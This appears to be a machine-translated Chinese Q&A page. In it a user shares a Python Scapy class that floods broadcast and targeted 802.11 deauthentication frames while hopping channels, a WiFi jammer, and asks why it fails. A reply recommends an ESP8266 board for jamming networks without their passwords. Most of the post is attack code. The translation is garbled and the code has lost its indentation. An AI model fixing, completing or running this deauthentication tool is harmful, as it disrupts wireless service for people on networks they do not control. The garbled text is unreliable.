所以我一直在用Scapy让Wifi干扰器工作。在
我遵循了这个非常简单的教程,应该足够工作了: https://www.youtube.com/watch?v=NKqG_i6qMJM
虽然我得到了相同的输出,但这没用。在
然后我发现了这个项目: https://github.com/DanMcInerney/wifijammer/blob/master/wifijammer.py
它会自动扫描和跳频来填充一些变量。如果我运行它,它工作得很好。在
所以我想出了我自己的代码,我认为它可以工作,但不知怎么的,好像什么都没发生,尽管所有的输出看起来都很好。在
这是我的AirJammer类(无法使代码在这里正确缩进,但在我的实际项目中是正确的):
class AirDeauthenticator(object):
def __init__(self):
self.deauth_running = False
self.running_interface = None
self.deauth_thread = None
self.channel_hopper_thread = None
self.channel_lock = Lock()
self.current_channel = 3
self.targeted_only = False # Flag if we only want to perform targeted deauthentication attacks
self._burst_count = 500 # Number of sequential deuathentication packet bursts to send
self._bssids_to_deauth = [] # MAC addresses of APs, used to send deauthentication packets to broadcast
self._clients_to_deauth = {} # Pairs clients to their connected AP to send targeted deauthentication attacks
def add_bssid(self, bssid):
self._bssids_to_deauth.append(bssid)
def add_client(self, client, bssid):
self._clients_to_deauth[client] = bssid
def set_burst_count(self, count):
self._burst_count = count
def hop_channels(self, interface, hop_interval):
while self.deauth_running:
print self.current_channel
Popen(['iw', 'dev', interface, 'set', 'channel', str(self.current_channel)], stdout=DEVNULL, stderr=PIPE)
with self.channel_lock:
self.current_channel += 1
if self.current_channel > 11:
self.current_channel = 1
sleep(hop_interval)
def deauthentication_attack(self, interface):
# Based on:
# https://raidersec.blogspot.pt/2013/01/wireless-deauth-attack-using-aireplay.html
packets = []
if not self.targeted_only:
for bssid in self._bssids_to_deauth:
deauth_packet = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=bssid, addr3=bssid) / Dot11Deauth()
packets.append(deauth_packet)
for client in self._clients_to_deauth.keys():
bssid = self._clients_to_deauth[client]
deauth_packet1 = Dot11(addr1=bssid, addr2=client, addr3=client) / Dot11Deauth()
deauth_packet2 = Dot11(addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth()
packets.append(deauth_packet1)
packets.append(deauth_packet2)
count = self._burst_count if self._burst_count > 0 else 5
print "N Packets: {}\n".format(len(packets))
while count >= 0:
for packet in packets:
packet.show()
send(packet, iface = interface, count = 1, inter = 0)
count -= 1
self.deauth_running = False
self.running_interface = None
def start_deauthentication_attack(self, interface, hop_interval=5):
self.running_interface = interface
self.deauth_thread = Thread(target=self.deauthentication_attack, args=(interface,))
self.channel_hopper_thread = Thread(target=self.hop_channels, args=(interface, hop_interval, ))
self.deauth_running = True
self.deauth_thread.start()
self.channel_hopper_thread.start()
这是我的测试代码:
^{pr2}$虽然我从scapy那里得到了以下警告,但输出似乎还不错: 。警告:找不到要到达目标的Mac地址。使用广播。 。警告:找不到要到达目标的更多Mac地址。使用广播。在
但我在wifijammer.py工具,而且工具仍然有效。在
当我试图发送这些数据包时,还有什么需要我关心的吗?在
我试过将界面置于监视器模式,但仍然没有成功。在
好吧,就我所能调试它而言,问题确实在于那个警告消息。如果我拔下usb wifi棒,然后再插回去,这个错误不会在第一次出现,如果我重复这个过程,它仍然会出现。在
当我使用wifijammer.py工具,但我反复分析了代码,没有找到任何可以避免这个scapy问题的设置机制。在
如果你买得起一些硬件,你可以购买
Node Mcu Esp-8266
,这样你就可以在不知道密码的情况下干扰wifi网络。我遵循了一个教程,它奏效了按照tutorial获取更多信息和源代码
谢谢你的阅读
相关问题 更多 >
编程相关推荐